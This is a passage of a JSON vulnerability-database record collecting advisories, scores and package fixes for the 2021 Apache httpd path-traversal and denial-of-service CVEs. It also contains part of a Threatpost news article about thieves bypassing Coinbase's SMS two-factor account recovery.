\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 mod24_md-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-debuginfo-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_session-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_ldap-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_ssl-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-tools-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 httpd24-devel-2.4.51-1.94.amzn1.i686 \n \u00a0\u00a0\u00a0 mod24_proxy_html-2.4.51-1.94.amzn1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 httpd24-manual-2.4.51-1.94.amzn1.noarch \n \n src: \n \u00a0\u00a0\u00a0 httpd24-2.4.51-1.94.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 mod24_proxy_html-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_ssl-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_session-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_md-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-debuginfo-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-tools-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 httpd24-devel-2.4.51-1.94.amzn1.x86_64 \n \u00a0\u00a0\u00a0 mod24_ldap-2.4.51-1.94.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-33193](<https://access.redhat.com/security/cve/CVE-2021-33193>), [CVE-2021-34798](<https://access.redhat.com/security/cve/CVE-2021-34798>), [CVE-2021-36160](<https://access.redhat.com/security/cve/CVE-2021-36160>), [CVE-2021-39275](<https://access.redhat.com/security/cve/CVE-2021-39275>), [CVE-2021-40438](<https://access.redhat.com/security/cve/CVE-2021-40438>), [CVE-2021-41524](<https://access.redhat.com/security/cve/CVE-2021-41524>), [CVE-2021-41773](<https://access.redhat.com/security/cve/CVE-2021-41773>), [CVE-2021-42013](<https://access.redhat.com/security/cve/CVE-2021-42013>)\n\nMitre: [CVE-2021-33193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33193>), 
[CVE-2021-34798](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34798>), [CVE-2021-36160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36160>), [CVE-2021-39275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39275>), [CVE-2021-40438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40438>), [CVE-2021-41524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524>), [CVE-2021-41773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773>), [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T07:52:00", "type": "amazon", "title": "Important: httpd24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T15:02:00", "id": "ALAS-2021-1543", "href": "https://alas.aws.amazon.com/ALAS-2021-1543.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-01T21:44:10", 
"description": "**Issue Overview:**\n\nA NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193)\n\nA NULL pointer dereference in httpd allows an unauthenticated remote attacker to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)\n\nAn out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated attacker to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)\n\nAn out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote attacker to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275)\n\nA Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)\n\nWhile fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\n\nA path transversal flaw was found in Apache 2.4.49. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally this flaw could leak the source of interpreted files like CGI scripts. 
(CVE-2021-41773)\n\nA path transversal and remote code execution flaw was found in Apache HTTP Server 2.4.49 and 2.4.50. A remote attacker could use this flaw to map URLs to files outside the expected document root. Additionally, this flaw could leak the source of interpreted files like CGI scripts. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013)\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_md-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 mod_session-2.4.51-1.amzn2.aarch64 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.51-1.amzn2.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_md-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 mod_session-2.4.51-1.amzn2.i686 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.51-1.amzn2.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 httpd-manual-2.4.51-1.amzn2.noarch \n \u00a0\u00a0\u00a0 
httpd-filesystem-2.4.51-1.amzn2.noarch \n \n src: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.src \n \n x86_64: \n \u00a0\u00a0\u00a0 httpd-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 httpd-devel-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 httpd-tools-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_ssl-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_md-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_proxy_html-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_ldap-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 mod_session-2.4.51-1.amzn2.x86_64 \n \u00a0\u00a0\u00a0 httpd-debuginfo-2.4.51-1.amzn2.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2021-33193](<https://access.redhat.com/security/cve/CVE-2021-33193>), [CVE-2021-34798](<https://access.redhat.com/security/cve/CVE-2021-34798>), [CVE-2021-36160](<https://access.redhat.com/security/cve/CVE-2021-36160>), [CVE-2021-39275](<https://access.redhat.com/security/cve/CVE-2021-39275>), [CVE-2021-40438](<https://access.redhat.com/security/cve/CVE-2021-40438>), [CVE-2021-41524](<https://access.redhat.com/security/cve/CVE-2021-41524>), [CVE-2021-41773](<https://access.redhat.com/security/cve/CVE-2021-41773>), [CVE-2021-42013](<https://access.redhat.com/security/cve/CVE-2021-42013>)\n\nMitre: [CVE-2021-33193](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33193>), [CVE-2021-34798](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34798>), [CVE-2021-36160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36160>), [CVE-2021-39275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39275>), [CVE-2021-40438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40438>), [CVE-2021-41524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524>), [CVE-2021-41773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773>), [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T07:57:00", "type": "amazon", "title": "Important: httpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T15:04:00", "id": "ALAS2-2021-1716", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1716.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-08-16T19:40:32", "description": "apache2 is vulnerable to denial of service. 
The vulnerability exists due to a null pointer dereference during HTTP/2 request processing.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T09:50:40", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2022-08-15T14:28:58", "id": "VERACODE:32398", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32398/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-16T19:28:11", "description": "Apache HTTP Server is vulnerable to path traversal attacks. 
An attacker could use a path traversal attack to map URLs to files outside of the document root when those files are not protected by the \u201crequire all denied\u201d directive in the Apache configuration file.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T21:08:53", "type": "veracode", "title": "Path Traversal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-08-15T14:29:33", "id": "VERACODE:32442", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32442/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T19:43:42", "description": "apache2 has path traversal. 
The vulnerability exists due to a flaw found in a change made to path normalization.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T07:50:10", "type": "veracode", "title": "Path Traversal", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-08-15T14:30:34", "id": "VERACODE:32397", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32397/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T06:53:48", "description": "Apache HTTP Server is an open source web server from the Apache Foundation. The server is fast, reliable, and extensible via a simple API. A denial-of-service vulnerability exists in Apache HTTP Server version 2.4.49, which stems from the detection of a new null pointer dereference during HTTP/2 request processing, allowing a denial-of-service attack on the server by an external source. 
No detailed vulnerability details are currently available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-10T00:00:00", "type": "cnvd", "title": "Apache HTTP Server Denial of Service Vulnerability (CNVD-2022-09237)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2022-02-10T00:00:00", "id": "CNVD-2022-09237", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-09237", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-11-05T07:11:41", "description": "Apache HTTP Server is an open source web server from the Apache Foundation. 
Apache HTTP Server version 2.4.49 has a path traversal vulnerability, which originates from the ap_normalize_path function introduced without strict checksum, and can be exploited by attackers to obtain sensitive information or take control of the target server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-08T00:00:00", "type": "cnvd", "title": "Apache HTTP Server path traversal vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-01-13T00:00:00", "id": "CNVD-2022-03222", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-03222", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "dsquare": [{"lastseen": "2021-11-26T18:37:32", "description": "Remote Code Execution in Apache\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-07-16T00:00:00", "id": "E-738", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:37:32", "description": "Path traversal vulnerability in Apache\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "dsquare", "title": "Apache 2.4.50 Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "E-739", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-11-01T16:05:32", "description": "On September 29, Ash Daulton, along with the cPanel Security Team, reported a path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.29 to the Apache security team. The issue was fixed within two days, under CVE-2021-41773, and the patch was released on October 4. Apache urged to deploy the fix, as it is already being actively exploited.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T20:15:00", "type": "akamaiblog", "title": "Mitigating CVE-2021-41773: Apache HTTP Server Path Traversal", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-07T20:15:00", "id": 
"AKAMAIBLOG:72129348AFF386C88DD2D4145C64F678", "href": "https://www.akamai.com/blog/news/how-akamai-helps-you-protect-against-0-days", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2021-10-05T20:16:21", "description": "The accounts of at least 6,000 Coinbase customers were robbed of funds after attackers bypassed the cryptocurrency exchange\u2019s multi-factor authentication (MFA).\n\nAccording to a notification letter ([PDF](<https://s3.documentcloud.org/documents/21073975/09-24-2021-coinbase-customer-notification.pdf>)) \u2013 seen and posted by [BleepingComputer, ](<https://www.bleepingcomputer.com/news/security/hackers-rob-thousands-of-coinbase-customers-using-mfa-flaw/>)which first reported the story \u2013 that Coinbase sent to affected customers and filed with the California state Attorney General\u2019s office, the theft happened between March and May 20, 2021.\n\nThe attacker(s) used a flaw in Coinbase\u2019s account recovery process to seize the SMS two-factor authentication tokens needed to break into customers\u2019 accounts and transfer funds to crypto wallets unassociated with Coinbase.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn order to pull it off, the culprits first needed access to victims\u2019 email addresses, passwords, phone numbers and personal email inboxes. 
Coinbase doesn\u2019t know exactly how the third parties gained access to all that, but the exchange doesn\u2019t think it\u2019s to blame: \u201cWe have not found any evidence that these third parties obtained this information from Coinbase itself,\u201d according to the exchange\u2019s breach notification.\n\nCoinbase noted that such information is often gleaned through phishing attacks or other social engineering techniques that trick victims into disclosing their login credentials.\n\n## Coinbase Phishing Attacks Are Rising\n\nIn fact, earlier this week, on Monday, Coinbase warned that [phishing attacks are on the rise](<https://blog.coinbase.com/phishing-attacks-are-on-the-rise-here-are-some-steps-you-can-take-to-protect-yourself-872833c7671b>), both in terms of volume and success rates. Between April and early May 2021, its security team saw a \u201csignificant uptick\u201d in Coinbase-branded phishing messages that targeted users of a range of commonly used email service providers: attacks that \u201cdemonstrated a higher degree of success\u201d at bypassing spam filters of certain older email services.\n\nCoinbase provided samples of the phishing attacks its team has seen, including the ones shown below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/10/01150844/locked-account-phishing-email-e1633115339529.png>)\n\n\u201cLocked account\u201d phishing email, designed to alarm the recipient into clicking without taking the time to verify other aspects of the message. \nSource: Coinbase.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/10/01151129/Hotmail-phish-e1633115503310.png>)\n\nFor some victims with Hotmail accounts, attackers attempted to add a malicious application to the user\u2019s inbox. If the recipient clicked \u201cYes,\u201d an attacker would be able to read all the user\u2019s emails (including password reset and device verification emails sent by Coinbase). 
Source: Coinbase.\n\nClearly, cryptocurrency thieves are nothing if not creative, and understandably so: They\u2019re going after a lucrative, juicy target. While they\u2019re considered a secure place for users to store their cryptocurrency assets, [researchers in 2018 proved](<https://threatpost.com/cryptocurrency-wallet-hacks-spark-dustup/140445/>) that wallets such as Ledger and Trezor are vulnerable to a number of cyber attacks.\n\nSubsequent events proved their point: In July 2020, an unauthorized third party [accessed Ledger\u2019s](<https://www.ledger.com/addressing-the-july-2020-e-commerce-and-marketing-data-breach>) e-commerce and marketing database, which held email addresses as well as contact and order details including first and last name, postal address, email address, and phone number.\n\nFollowing the July attack, researchers discovered [widespread campaigns](<https://threatpost.com/malicious-google-web-extensions-cryptowallet/154832/>) spreading malicious browser extensions that were abusing Google Ads and well-known cryptocurrency brands including Ledger to lure victims and eventually steal their cryptocurrency wallet credentials. 
Other wallets targeted in the campaign included Electrum, Exodus, Jaxx, KeepKey, MetaMask, MyEtherWallet and Trezor.\n\nAs well, the rise of cryptocurrency has made compromised crypto accounts hugely valuable in Dark Web marketplaces, according to the [2021 Dark Web price index](<https://threatpost.com/dark-web-markets-stolen-data/164626/>) from Privacy Affairs.\n\n\u201cDue to the skyrocketing prices of Bitcoin and other cryptocurrencies, hacked accounts may hold large sums of coin-based currency and cash, protected by relaxed security measures after the initial verification process,\u201d according to the report, which listed the average price for a hacked Coinbase-verified account to be $610.\n\n## SMS 2FA Authentication Flaw\n\nTL;DR: There are a lot of ways that the attackers could have gotten Coinbase users\u2019 personal details.\n\nBut beyond the personal information they needed to crack victims\u2019 accounts, the thieves needed more. For customers who use SMS texts for two-factor authentication (2FA), the unauthorized third parties had to leverage what Coinbase called a flaw in its SMS account recovery process, in order to receive an SMS 2FA token so as to gain access to accounts.\n\nCoinbase didn\u2019t go into detail about the flaw: It only said that as soon as it learned about the issue, it \u201cupdated our SMS Account Recovery protocols to prevent any further bypassing of that authentication process.\u201d\n\nIn a [guide on securing accounts](<https://help.coinbase.com/en/coinbase/privacy-and-security/data-privacy/how-can-i-make-my-account-more-secure>), Coinbase recommends enabling MFA authentication using 